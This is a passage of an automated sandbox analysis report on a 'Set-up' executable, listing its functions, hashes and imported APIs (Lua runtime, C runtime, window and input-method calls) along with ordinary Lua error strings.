                                                                                          • Opcode Fuzzy Hash: c6c6782ba6439e75dab2239e2084cbac9e912f0c0b2c4c946028eadcc6e3622e
                                                                                          • Instruction Fuzzy Hash: 2DB17B70A0025ADFDB24CF64DD85BAEBBB4FF04300F0585E8E54AAB285D7719A99CF50
                                                                                          APIs
                                                                                            • Part of subcall function 00A6B710: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,75296BA0,00A632E3), ref: 00A6B85D
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65C1F
                                                                                          • roundf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00A65C2E
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A65CBB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: roundf$_invalid_parameter_noinfo_noreturnmemcpy
                                                                                          • String ID: gfff$gfff
                                                                                          • API String ID: 1395518917-3084402119
                                                                                          • Opcode ID: 3adaa40cafe91b2342c589888fb9fb20c7a6b5670d1e0868069e1e0ab179fa08
                                                                                          • Instruction ID: a5ea189261fc354cbf0d18213cd456e6ae91b43fd2f4b50100d9cc638612425d
                                                                                          • Opcode Fuzzy Hash: 3adaa40cafe91b2342c589888fb9fb20c7a6b5670d1e0868069e1e0ab179fa08
                                                                                          • Instruction Fuzzy Hash: 9BA10171E00219DFCB04CFA9D984AADBFB5FF88300F658159E845BB289D730A965CF94
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00A68269), ref: 00A68330
                                                                                          • GetWindowLongW.USER32(?,000000FA), ref: 00A68384
                                                                                          • CreateWindowExW.USER32(00000100,ListBoxX,00C0DC74,80040000,00000064,00000064,00000096,00000050,?,00000000,00000000), ref: 00A683AE
                                                                                          • MapWindowPoints.USER32(?,00000000,00000001,00000001), ref: 00A683FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateLongPoints_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: ListBoxX
                                                                                          • API String ID: 412080474-1947864590
                                                                                          • Opcode ID: 6f48c3512cfe50aad15e49d649b6257daccfb5a48d3b72ba38161134165e1ab1
                                                                                          • Instruction ID: d6a22ddb067d350125f8dfe9aa5ff337171e4650479a83f504c3a62766054e00
                                                                                          • Opcode Fuzzy Hash: 6f48c3512cfe50aad15e49d649b6257daccfb5a48d3b72ba38161134165e1ab1
                                                                                          • Instruction Fuzzy Hash: 1241ACB12003019FDB24CF28D889B6ABFF4FF84710F048A69F9959B286D774D864CB61
                                                                                          APIs
                                                                                          • lua_checkstack.SET-UP(?,?), ref: 00BDC331
                                                                                          • lua_pushcclosure.SET-UP(?,?,?), ref: 00BDC396
                                                                                          • luaL_error.SET-UP(?,stack overflow (%s),too many upvalues), ref: 00BDC415
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_errorlua_checkstacklua_pushcclosure
                                                                                          • String ID: stack overflow (%s)$too many upvalues
                                                                                          • API String ID: 913152060-3471891533
                                                                                          • Opcode ID: 27197b9742829a667ec6249af7862d56209516870c46eb2e2586e9b79b836fb1
                                                                                          • Instruction ID: d8d82e802c4e5c2664f5798dd3c7abd79cfa5bdb360b38fb443cf8edddb3d20d
                                                                                          • Opcode Fuzzy Hash: 27197b9742829a667ec6249af7862d56209516870c46eb2e2586e9b79b836fb1
                                                                                          • Instruction Fuzzy Hash: B331AD75A006058FCB14CF19D880A5AFBE5FF84321B14C5AEE81A8B352EB30E901CF95
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C382E0,00000000), ref: 00BE0185
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE019D
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE01B4
                                                                                          Strings
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BE01AE
                                                                                          • multiple Lua VMs detected, xrefs: 00BE0197
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-3403695784
                                                                                          • Opcode ID: 8183245586c888bfc5fcfc7a3107ba3e22055c917b64c565db912e2efd4b5864
                                                                                          • Instruction ID: c73cf421ac453141fed579ae1fd464472de7991b9b534b16a8a7f67ca5f27481
                                                                                          • Opcode Fuzzy Hash: 8183245586c888bfc5fcfc7a3107ba3e22055c917b64c565db912e2efd4b5864
                                                                                          • Instruction Fuzzy Hash: 0121F4B16007049BC710BF18D845B5ABBE4EF04710F10C5D9FD899B392EB75AC558BCA
                                                                                          APIs
                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?), ref: 00BDBA2D
                                                                                          • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00BDBA35
                                                                                          • lua_pushfstring.SET-UP(?,cannot %s %s: %s,read,?,?), ref: 00BDBA96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: _errnolua_pushfstringstrerror
                                                                                          • String ID: cannot %s %s: %s$read
                                                                                          • API String ID: 1081185838-1204257098
                                                                                          • Opcode ID: f40dbc2f4593ded1abc5a6b92bd54a19ff8ca028029fe23a707c20594258aaf2
                                                                                          • Instruction ID: 527f267047cef471c82e840e36750f5adee33c52cdaaef46a6f9c3e27a73fe35
                                                                                          • Opcode Fuzzy Hash: f40dbc2f4593ded1abc5a6b92bd54a19ff8ca028029fe23a707c20594258aaf2
                                                                                          • Instruction Fuzzy Hash: A411D371B002449BDB14AB2C9C95A2FB2E5DF80315B5580BAF80A8B357FE75DC15C7D2
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C38AA0,00000000), ref: 00BF91A5
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BF91BD
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BF91D4
                                                                                          Strings
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BF91CE
                                                                                          • multiple Lua VMs detected, xrefs: 00BF91B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-3403695784
                                                                                          • Opcode ID: 10df19beb663bc9f33b24c8e0ad351d4154564f7a3cb78c47ca6b905f9b185a5
                                                                                          • Instruction ID: 66efd579f81598c59381d9b5f11ee5634f0665ca5c355a16edc1439a5d17cb86
                                                                                          • Opcode Fuzzy Hash: 10df19beb663bc9f33b24c8e0ad351d4154564f7a3cb78c47ca6b905f9b185a5
                                                                                          • Instruction Fuzzy Hash: 6E11C6B1B00619ABC6107A14CC4AB6A77D4EF00714F1089E8FD95972D2EB75AA198BCA
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C38448,00000000), ref: 00BE1B65
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE1B7D
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE1B94
                                                                                          Strings
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BE1B8E
                                                                                          • multiple Lua VMs detected, xrefs: 00BE1B77
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: multiple Lua VMs detected$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-3403695784
                                                                                          • Opcode ID: 1ce51f7852779235a3e68c34a8dcd7cdf1ba0d47b0fdb27992c194c5ddbd9f75
                                                                                          • Instruction ID: a43834fbe3769fd0dff845236c3d874c0fa507d6a747c46b852f203736eaa385
                                                                                          • Opcode Fuzzy Hash: 1ce51f7852779235a3e68c34a8dcd7cdf1ba0d47b0fdb27992c194c5ddbd9f75
                                                                                          • Instruction Fuzzy Hash: C01129B1A0071467C6107F28C846B5A77D4EF00714F208AD8FD95972D2FF7599198BCA
                                                                                          APIs
                                                                                          • lua_getstack.SET-UP(?,00BDA842,?,?), ref: 00BDA9EC
                                                                                          • lua_getinfo.SET-UP(?,00C5F488,?,?,?,?), ref: 00BDAA02
                                                                                            • Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE2315
                                                                                            • Part of subcall function 00BE22B0: strchr.VCRUNTIME140 ref: 00BE235B
                                                                                          • lua_pushfstring.SET-UP(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 00BDAA1C
                                                                                          • lua_pushfstring.SET-UP(?,00C62FE3,?,?,?), ref: 00BDAA39
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_pushfstringstrchr$lua_getinfolua_getstack
                                                                                          • String ID: %s:%d:
                                                                                          • API String ID: 2558581977-2688275532
                                                                                          • Opcode ID: f871eb5b18f5f60393d27602928e78fe5c3a935e6d79d2693afb6a6079219d63
                                                                                          • Instruction ID: 7bde1c8dbd5d306d07b7e22c7a75ebe9ef2adc92cef463f87cabd3da0875f9be
                                                                                          • Opcode Fuzzy Hash: f871eb5b18f5f60393d27602928e78fe5c3a935e6d79d2693afb6a6079219d63
                                                                                          • Instruction Fuzzy Hash: 4A016231A0551CAB8B01FBA89D02DFFB3ECDF05305F1041AAFD05A7252EB259B1987E6
                                                                                          APIs
                                                                                          • lua_checkstack.SET-UP(?,?,?,?,?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF3B
                                                                                          • luaL_error.SET-UP(?,stack overflow (%s),?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF5A
                                                                                            • Part of subcall function 00BDAA50: luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B
                                                                                            • Part of subcall function 00BDAA50: lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
                                                                                            • Part of subcall function 00BDAA50: lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
                                                                                            • Part of subcall function 00BDAA50: lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
                                                                                            • Part of subcall function 00BDAA50: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98
                                                                                            • Part of subcall function 00BDA9A0: lua_typename.SET-UP(?,?,?,?,?,?,?,?,00000000), ref: 00BDA9AE
                                                                                          • luaL_error.SET-UP(?,stack overflow,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF65
                                                                                          • luaL_argerror.SET-UP(?,?,value expected,?,?,?,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDAFD2
                                                                                          • lua_tolstring.SET-UP(?,?,?,?,?,?,?,value expected,?,?,?,?,?,stack overflow,?,00000000), ref: 00BDAFED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_argerrorL_where_errnolua_checkstacklua_concatlua_errorlua_pushvfstringlua_tolstringlua_typename
                                                                                          • String ID: invalid option '%s'$stack overflow$stack overflow (%s)$value expected
                                                                                          • API String ID: 3599489640-40620427
                                                                                          • Opcode ID: e0255988457d65e5297b11b1ae0b733a1f70a1b538d206701617c3d899589a0b
                                                                                          • Instruction ID: debdfc66ed909dd9a4a0be7a06b62fc1b7fcf75ff7a857ac140bb57c3397c02b
                                                                                          • Opcode Fuzzy Hash: e0255988457d65e5297b11b1ae0b733a1f70a1b538d206701617c3d899589a0b
                                                                                          • Instruction Fuzzy Hash: 2CF03AB11082186B4B15AB15DC82DAEBBD8DA01354B1085E7FC18DB346FA30E95586AB
                                                                                          APIs
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A75807
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A75865
                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00A758D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: strncmp
                                                                                          • String ID:
                                                                                          • API String ID: 1114863663-0
                                                                                          • Opcode ID: e0ffb514176261c5276352c74498e19ec196370da01e7523dd3812be0255c676
                                                                                          • Instruction ID: fd7818d019626e463cbacea5f1f02fed47b26e2de4385f5afa7fe7afaf109bf3
                                                                                          • Opcode Fuzzy Hash: e0ffb514176261c5276352c74498e19ec196370da01e7523dd3812be0255c676
                                                                                          • Instruction Fuzzy Hash: 2AA12C71D0051ACFCB25CF28DD84BA9B7B9EF44310F1082E9E91AA7295D771AE85CF80
                                                                                          APIs
                                                                                            • Part of subcall function 00A74900: memset.VCRUNTIME140 ref: 00A74929
                                                                                          • ImmGetContext.IMM32(?), ref: 00A6DA1B
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 00A6DA49
                                                                                          • ImmEscapeW.IMM32(00000000,00000000,00001008,?), ref: 00A6DA59
                                                                                          • ImmReleaseContext.IMM32(?,00000000), ref: 00A6DA78
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6DAAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Context$EscapeKeyboardLayoutRelease_invalid_parameter_noinfo_noreturnmemset
                                                                                          • String ID:
                                                                                          • API String ID: 1657687289-0
                                                                                          • Opcode ID: b1cd6cdb2d72ae108da9978fb457e3c023128ff3503141b4b868adae2fbbc19b
                                                                                          • Instruction ID: 55ef7c5d74e2d3ae3e07ebcf8fb913eb1d015a7e21dce1c6c28d1a29850eed83
                                                                                          • Opcode Fuzzy Hash: b1cd6cdb2d72ae108da9978fb457e3c023128ff3503141b4b868adae2fbbc19b
                                                                                          • Instruction Fuzzy Hash: EA51A071E042089FDB14DFA8CD85BAEBBB5FF88354F14812DE816A7391DB30A945CB91
                                                                                          APIs
                                                                                          • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96BCA
                                                                                          • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96BDC
                                                                                          • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96CD8
                                                                                          • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00A950BA), ref: 00A96D11
                                                                                          • ?_Xbad_alloc@std@@YAXXZ.MSVCP140 ref: 00A96D1E
                                                                                            • Part of subcall function 00A96DF0: ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(?,?,?,00000000,?,00A954B2,?,?,?,00A950C5,?,?,?,00000000,?,00A8F1C1), ref: 00A96E0A
                                                                                            • Part of subcall function 00A96DF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000100,?,?,00000000,?,00A954B2,?,?,?,00A950C5,?,?,?,00000000), ref: 00A96E4D
                                                                                            • Part of subcall function 00A96DF0: ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,00000000,?,00A8F1C1,?,?,00000000,00A8CC3A,?,?,00000000,?,00000000,?,?), ref: 00A96E5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
